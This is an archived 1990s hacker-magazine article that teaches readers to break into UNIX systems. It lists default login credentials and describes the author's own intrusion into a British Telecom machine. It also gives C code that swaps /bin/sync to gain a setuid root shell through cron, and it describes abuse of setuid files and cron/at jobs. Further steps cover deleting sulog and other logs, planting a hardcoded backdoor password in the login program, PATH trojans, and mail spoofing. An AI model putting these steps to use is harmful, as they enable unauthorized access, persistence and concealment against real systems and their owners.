💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › HNET › hnet0104.hac captured on 2022-06-12 at 12:15:11.

View Raw

More Information

-=-=-=-=-=-=-

                H-NET H-NET H-NET H-NET H-NET H-NET H-NET H 
                N                                         N 
                E          ** H-Net Magazine **           E 
                T                                         T 
                H   Volume One, Issue 1, File #04 of 20   H 
                N                                         N 
                E     Hacking UNIX, part 1, by WEAZLE.    E  
                T                                         T 
                H-NET H-NET H-NET H-NET H-NET H-NET H-NET H 
 
 
UNIX HACKING - PART 1. 
---------------------- 
 
You've got the 'login:' prompt - what now? 
 
try the following id's and passwords:- 
 
                ID              Password 
                --------        -------- 
                root            root 
                sysman          sysman 
                admin           admin 
                sysadmin        sysadmin (or admin) 
                unix            unix 
                uucp            uucp (or comms) 
                rje             rje 
                guest           guest 
                demo            demo 
                daemon          daemon 
                sysbin          sysbin (or bin) 
                bin             bin 
                games           games (or player sometimes) 
 
Some of these id's might not even need a password - in that case you will go 
striaght through to the '


 prompt when you have entered the ID!! 
 
Some of you might be thinking that the above accounts would be the most likely 
ones for any hackers to try and therefore the system manager of a UNIX system 
would put a password on such accounts or at least change passwords to something 
a little less obvious - well I would think that too - but it is suprising what 
percentage of systems you can get into by trying out the above accounts.  I  
don't know why the System Managers havent done anything about these accounts,  
it is probably the old British attitude of 'it will never happen to our system' 
- it can and probably will!  And dont think that it is only the small companies 
that dont do very much about the security of there UNIX systems - I logged onto 
a BT Unix computer (on a freephone/toll-free number I might add) with no id's 
or passwords so I just started using some of the ones listed above - none of 
the ones that I used worked - I was just about to give up when I thought that I 
would try one last ID and Password before disconnecting and throwing the number 
away. I didnt think for one moment that the ID that I was going to try would 
work, after all it was one of British Telecoms UNIX machines - and of course 
they would be really strict about security and things like that, but I will go 
ahead and try it anyway... :- 
 
login:sysman 
password:sysman 
 
$ 
 
I nearly fell off my chair when I got through on this account and to the '


  
UNIX prompt, how could British Telecoms computer security be so lax? Who cares, 
 I was in! - and there was no password on the SU command!!! There is a list of
default passwords in this issue and continuous updates on Hackernet BBS. 
 

If none of these accounts let you in then try obvious things like first names  
(paul,john,steve,etc.), try using the id 'who' which on some systems will at  
the 'login:' prompt tell you who else is on (useful clues for hackers!) or see 
 if there are any clues on the logon screen eg "Welcome to British Telecoms  
RACE computer" you would try things like race,race or btr/engineer, est. ok? 
 
When you have logged onto a UNIX system, you should always do the following: 
 
$ who -u        
$ ps -ef        
$ ps -u root  
 
This prints out who is on, who is active, what is going on and what they are 
 doing at the moment, everything in the background, and so on.    
 
If you are calling the UNIX system for the first time you should enter the  
following :- 
 
$ grep :: /etc/passwd 
 
This command will output to your screen parts of the 'passwd' userlist.  The  
ones that we are interested in are the ones like this :- 
 
paul::3323:2343:race user:/usr/paul 
 
i.e. the ones with '::' after the username (paul in this case).  What this  
means is that the user paul does not need a password to log on - funnily enough 
 it is usually such accounts that have the highest level of access! 
 
Also do this: 
 
$ find / -name "*log*" -print    
 
This lists out all the files with the name 'log' in it. If you do find a  
process that is logging what you do, or an odd log file, change it as soon as 
 you can. If you think someone may be looking at you and you don't want to  
leave (Useful for school/college or university computers) then go into   
something that allows shell breaks (VI for example), or use redirection to your 
 advantage:  
 
$ cat < /etc/passwd    
 
That puts 'cat' on the ps, not 'cat /etc/passwd'. If you're running a setuid 
 process, and don't want it to show up on a ps (Not a very nice thing to have  
happen), then: 
 
$ super_shell        
# exec sh    
(Runs the setuid shell (super_shell) and puts something 'over' it. You may also 
want to run 'sh' again if you are nervous, because if you break out of an  
exec'ed process, you die. Neat, huh?  
 
Improving your id:    
 
Firstly, you should issue the command  
 
$id 
 
The system will then tell you your uid and euid. This is useful for checking on 
setuid programs to see if you have root euid privs.  
 
Also, do this:        
$ find / -perm -4000 -exec /bin/ls -lad {} ";"    
 
Yes, this finds and does an extended list of all the files that have the setuid 
bit on them, like /bin/login, /bin/passwd, and so on.  
 
If any of them look nonstandard, play with them, you never can tell what a ^|  
will do to them sometimes.  Also, if any are writeable and executable, copy sh 
over them, and you'll have a setuid root shell. Just be sure to copy whatever  
was there back, or else your stay might not last very much longer.  
 
What, you have the 'bin' passwd? Well, game over. You have control of the 
system. Everything in the bin directory is owned by bin (with the exception of  
a few things), so you can modify them at will. Since cron executes a few 
programs as root every once in a while, such as /bin/sync, try this:- 
 
       main() 
          { 
          if (getuid()==0 || getuid()==0)          
          {                     
          system("cp /bin/sh /tmp/sroot"); 
          system("chmod 4777 /tmp/sroot");   
          }                
          sync();           
          } 
 
...continued from previous page...  
 
$ cc file.c        
$ cp /bin/sync /tmp/sync.old        
$ mv a.out /bin/sync        
$ rm file.c    
 
Now, as soon as cron runs /bin/sync, you'll have a setuid shell in /tmp/sroot. 
Feel free to hide it. The 'at' & 'cron' commands l ook at the 'at' dir.  
Usually /usr/spool/cron/atjobs. If you can  run 'at' (check by typing 'at'),  
and 'lasttimedone' is writable, then submit a blank 'at' job, edit  
'lastimedone' to do what you want it to do, and move lasttimedone over your  
entry (like 88.00.00.00). Then the commands you put in lasttimedone will be  
ran as that file's owner. Cron: in /usr/spool/cron/cronjobs, there are a list 
of  people running cron jobs.  Cat rot's, and see if he runs any of the  
programs owned by you (Without doing a su xxx -c "xxx"). For that matter, check 
all the crons. If you can take one system login, you should be able to get  
the rest, in time. 
 
The disk files.    
 
These are rather odd. If you have read permission on the disks in the '/dev'  
directory then you can read any file on the system.  
 
All you have to do is find it in there somewhere. If the disk is writeable,  
if you use /etc/fsbd, you can modify any file on the system into whatever  
you want, such as  by changing the permissions on '/bin/sh' to 4555. Since this 
is pretty difficult to understand I won't bother with it any more.  
 
Trivial su.    
 
You know with su you can log into anyone elses account if you know their 
passwords or if you're root. There are still a number of system 5's that have 
uid 0, null passwd, rsh accounts on them. Just be sure to remove your entry in 
the '/usr/adm/' directory - the log file is called 'sulog' and can be removed 
 with the following command if you havent mastered the UNIX editor 'VI' yet :- 
 
$ rm /usr/adm/sulog 
 
or sometimes:- 
 
$ rm /usr/admin/sulog  
 
 
 
but one command that I always use on any new system conquest is :- 
 
$ find / -name "sulog" -print 
 
This will find all the files called 'sulog' - as some system managers have been 
known to have two sulogs running at the same time, if you delete or edit the 
one in the usual directory and then they would have a backup copy in another 
directory as well. 
 
Trojan horses?  On unix?    
 
Yes, but because of the shell variable PATH, we are generally out of luck, 
because it usually searches the '/bin' and '/usr/bin' directories first. 
 
However, if the first field is a colon, files in the present  directory are  
searched first. Which means if you put a modfied version of 'ls' there..... If 
this isn't the case, you will have to try something more blatant, like putting 
it in a game. If you have a system login, you may be able to get something  
done like that. See cron. 
 
Taking over 
 
Once you have root privs, you should read all the mail in the '/usr/mail' 
directory just to be sure that nothing interesting is in there, or anyone is 
passing another systems passwd about even! You may want to add another entry to 
the passwd file, but that's relatively dangerous to the life of your machine. 
Be sure not to have anything out of the ordinary as the entry (i.e., No uid 0). 
 
Get a copy of the login program (if at all possible) of that same version of  
unix, and modify it a bit. On system 5, here's a modification pretty common in 
the routine to check correct passwds, on the line before the actual pw check 
put a  
 
if (!(strcmp(pswd,"h-net"))) return(1);   
 
to check for your 'backdoor' password "h-net", enabling you to log on as any  
valid user that isn't uid 0 (On system 5). 
 
Other UNIX tricks 
 
Have you ever been on a system that you couldn't get 'root' status or read the 
Systems/L.sys file?  Well, this is a cheap way to overcome it:- 
 
$ uuname  
 
will list all machines reachable by your unix, then, assuming that they aren't 
direct, and that the modem is available:- 
 
$ cu -d host.you.want             
 
[or] 
 
$ uucico -x99 -r1 -shost.you.want    
 
Both will do about the same for us.  This will fill your screen with lots of 
trivial information, but will eventually get to the stage of printing the 
telephone number to the other system.   
 
'-d' enables the cu diagnostics, '-x99' enables the uucico highest debug, and 
'-R1' says 'uucp master'. A year or two ago, almost every system had their uucp 
password set to the same thing as their nuucp passwd (Thanks to the Systems 
file), so it was a breeze getting in. Even nowadays, some places do it.. you 
never can tell.     
 
 
 
Uucp 
 
Uucico and uux are limited by the Permissions file, and in most cases, that 
means means you can't do anything except get & take from the uucppublic 
directories. Then again, if the permission/L.cmd is blank, you should be able  
to take what files you want.  
 
Sending mail 
 
Sometimes, the mail program checks only the shell variable LOGNAME, so change 
it, export it, and you may be able to send mail as anyone. Mainly early system 
five's will let you do it thus :- 
                                 
$ LOGNAME="root";export LOGNAME  
 
Printing out all the files on the system 
 
Useful if you're interested in the filenames:-  
 
$ find / -print >file_list&     
 
And then do a 'grep text file_list' to find any files with 'text' in their 
names. Like grep [.]c file_list, grep host file_list....    
 
Printing out all restricted files 
 
Useful when you have root privileges. As a normal user, do :- 
 
$ find / -print >/dev/null&     
 
This prints out all non-accessable directories, so become root and see what 
they want to hide from you! 
 
UNIX Humour    
 
On a system 5, do this :-  
 
$ cat "food in cans"    
 
or :- 
 
$ banner "H-Net Lives!" 
 
Hehehe...... 
 
Password hacking -Salt 
 
In a standard /etc/passwd file, passwords are 13 characters long. This is a 11 
char encrypted passwd and a 2 char encryption modifier (salt), which is used to 
change the DES (data encryption standard) algorithm in one of 4096 ways. Which 
means that there is no decent way to go and reverse hack it. Yet. On normal 
system 5 UNIX systems passwords are supposed to be 6-8 characters long and have 
both numeric and alphabetic characters in them. Which makes a dictionary hacker 
pretty worthless. However if a user keeps insisting that his password is going 
to be 'h-net' usually the system will comply (Depending on version). I have yet
to try it, but having the hacker try the normal entry, and then the entry  
terminated by [0-9] is said to have remarkable results, if you don't mind the 
10-fold increase in time. 
 
        Written by the Weazle, (Hackers Hideout on Hackernet BBS) 
 
=============================================================================== 
[Hackernet BBS,LEEDS,UK(0532)557739, 24hrs. Home of H-Net Hacking magazine]